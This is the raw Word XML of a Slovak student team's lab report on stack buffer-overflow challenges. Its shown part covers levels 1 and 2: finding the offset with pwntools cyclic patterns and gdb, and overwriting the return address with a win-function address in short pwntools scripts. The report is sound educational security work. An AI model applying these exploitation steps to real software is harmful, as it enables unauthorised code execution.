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right" w:tblpY="10186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629"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C3308" w:rsidRPr="004464F8" w14:paraId="5E544854" w14:textId="77777777" w:rsidTr="008134AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="083D3E1B" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>Názov tímu:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30844B94" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3308" w:rsidRPr="004464F8" w14:paraId="6EC52959" w14:textId="77777777" w:rsidTr="008134AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62679701" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>Členovia:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B18EF0F" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>Nicolas Macák</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4697E94B" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>Veronika Szabóová</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDDA9BA" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r w:rsidRPr="004464F8">
              <w:t>Petra Kirschová</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1579086207"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="1CD020F0" w14:textId="77777777" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
          <w:r w:rsidRPr="004464F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0CCF720" wp14:editId="22312F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71BC0A68">
                  <v:group id="Grou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2EDA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 w:rsidRPr="004464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021AF7" wp14:editId="6FD148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4CF66" w14:textId="52C58105" w:rsidR="000C3308" w:rsidRPr="00786FFE" w:rsidRDefault="00287BCE" w:rsidP="001623E6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5A32" w:rsidRPr="00C85A32">
                                      <w:t>Blok 3:</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C85A32">
                                      <w:t xml:space="preserve"> </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C85A32" w:rsidRPr="00C85A32">
                                      <w:t>Memo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4021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624CF66" w14:textId="52C58105" w:rsidR="000C3308" w:rsidRPr="00786FFE" w:rsidRDefault="00B76DB0" w:rsidP="001623E6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5A32" w:rsidRPr="00C85A32">
                                <w:t>Blok 3:</w:t>
                              </w:r>
                              <w:r w:rsidR="00C85A32">
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidR="00C85A32" w:rsidRPr="00C85A32">
                                <w:t>Memor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8C5659" w14:textId="4E312884" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
          <w:r w:rsidRPr="004464F8">
            <w:rPr>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="01B1FEF2" w14:textId="22230609" w:rsidR="00C85A32" w:rsidRPr="002C08DF" w:rsidRDefault="00C85A32" w:rsidP="00E15F11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Na riešenie úloh sme využívali dekompilátor Binary Ninja na statickú analýzu a knižnicu pwntools na vykonanie útokov.</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiež sme pomocou checksec pozreli, aké bezpečnostné obmedzenia sú pre dané úlohy zapnuté, v úlohách 1-4 bol stack canary a PIE vypnutý, v leveli 5 bol zapnutý PIE flag a v leveloch 6-7 bol zapnutý stack canary aj PIE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD99941" w14:textId="19197BE0" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004464F8">
        <w:t>Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7FBAC4" w14:textId="36FF15D8" w:rsidR="00C85A32" w:rsidRPr="0079414C" w:rsidRDefault="0079414C" w:rsidP="0091497A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0091497A" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A6F21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1D435" w14:textId="1386FAE5" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="00C85A32" w:rsidP="007C2B35">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offset sme zistili poslaním cyklického patternu ako vstup do programu</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a sledovali sme stav stacku v gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017241D" w14:textId="77777777" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="000336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145086"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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 pwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D14D44" w14:textId="77777777" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="000336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145086"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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p 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=</w:t>
      </w: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 pwn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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gdb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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>debug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(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"/memory_level_1"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007BC58" w14:textId="77777777" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="000336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145086"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sendline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(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"200"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)</w:t>
      </w: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43D12DDF" w14:textId="02CD2513" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="002C08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14508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print(</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clean</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000336BC" w:rsidRPr="002C08DF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4AD99CCE" w14:textId="77777777" w:rsidR="000336BC" w:rsidRPr="002C08DF" w:rsidRDefault="000336BC" w:rsidP="000336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75145086"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>send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(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwn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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyclic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(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>200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,</w:t>
      </w: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 n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=</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8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))</w:t>
      </w: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148AC7BF" w14:textId="45C54647" w:rsidR="000336BC" w:rsidRDefault="000336BC" w:rsidP="00C85A32">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC60524" wp14:editId="6BA75555">
            <wp:extent cx="5728900" cy="1319530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65" b="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="132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A900" w14:textId="13A19877" w:rsidR="00C85A32" w:rsidRPr="002C08DF" w:rsidRDefault="000336BC" w:rsidP="00C85A32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">aujíma nás čo je na vrchu </w:t>
      </w:r>
      <w:r w:rsidR="0091497A" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zásobníka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, čo zistíme pomocou</w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>x/gx $rsp</w:t>
      </w:r>
      <w:r w:rsidR="0091497A" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD2527" w14:textId="0158E1A3" w:rsidR="00C85A32" w:rsidRPr="002C08DF" w:rsidRDefault="000336BC" w:rsidP="00C85A32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>osta</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>li sme</w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x616161616161616a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, čo využijeme pri hľadaní offsetu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F140E" w14:textId="3771603F" w:rsidR="00352E27" w:rsidRPr="002C08DF" w:rsidRDefault="000336BC" w:rsidP="00352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238631809"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwn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.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyclic_find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(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x616161616161616a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,</w:t>
      </w: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 n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=</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF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43FD0A60" w14:textId="1313FBCF" w:rsidR="0079414C" w:rsidRPr="002C08DF" w:rsidRDefault="00352E27" w:rsidP="0091497A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00C85A32" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ostaneme </w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">offset = </w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>72</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18D794" w14:textId="5C67DFD4" w:rsidR="0091497A" w:rsidRPr="0079414C" w:rsidRDefault="0079414C" w:rsidP="0091497A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0091497A" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Prepísanie návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D80A9B" w14:textId="22A0E9A5" w:rsidR="0079414C" w:rsidRPr="002C08DF" w:rsidRDefault="0079414C" w:rsidP="0079414C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ako vstup pošleme reťazec dĺžky rovnej offsetu a adresu win funkcie, ktorú získame z Binary Ninja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B46DE" w14:textId="77777777" w:rsidR="002C08DF" w:rsidRDefault="002C08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685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741A9075" w14:textId="77777777" w:rsidR="002C08DF" w:rsidRDefault="002C08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685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ces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/memory_level_1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24CDB1" w14:textId="77777777" w:rsidR="002C08DF" w:rsidRDefault="002C08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685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200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0F3DC70" w14:textId="77777777" w:rsidR="002C08DF" w:rsidRDefault="002C08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685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72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64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x401216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offset + adresa win funkcie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768FD153" w14:textId="6DEB1552" w:rsidR="002C08DF" w:rsidRDefault="002C08DF" w:rsidP="002C08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35685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E7194F" w14:textId="2CC6ECBD" w:rsidR="0091497A" w:rsidRPr="002C08DF" w:rsidRDefault="002C08DF" w:rsidP="00513D64">
      <w:r w:rsidRPr="00513D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6674D132" wp14:editId="74A7DA88">
            <wp:extent cx="5731510" cy="1249680"/>
            <wp:effectExtent l="0" t="0" r="254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1"/>
                    <a:srcRect b="3150"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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5512" w14:textId="32C88FB1" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="000C3308">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004464F8">
        <w:lastRenderedPageBreak/>
        <w:t>Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9639F" w14:textId="27E82286" w:rsidR="004C1622" w:rsidRPr="0079414C" w:rsidRDefault="004C1622" w:rsidP="0075283F">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00F7282A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814E289" w14:textId="33120706" w:rsidR="004C1622" w:rsidRPr="002C08DF" w:rsidRDefault="004C1622" w:rsidP="00B7711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offset sa dal pri vstupe veľkosti 8 určiť odčítaním návratovej adresy a začiatku buffera,</w:t>
      </w:r>
      <w:r w:rsidR="002922C3" w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ktoré sme vyčítali z gdb</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF7893" w14:textId="0B72393E" w:rsidR="004C1622" w:rsidRPr="00ED59AF" w:rsidRDefault="004C1622" w:rsidP="00ED59AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x7ffda2aa2548 - 0x7ffda2aa24d0 = 0x78</w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">offset = </w:t>
      </w:r>
      <w:r w:rsidRPr="002C08DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
    </w:p>
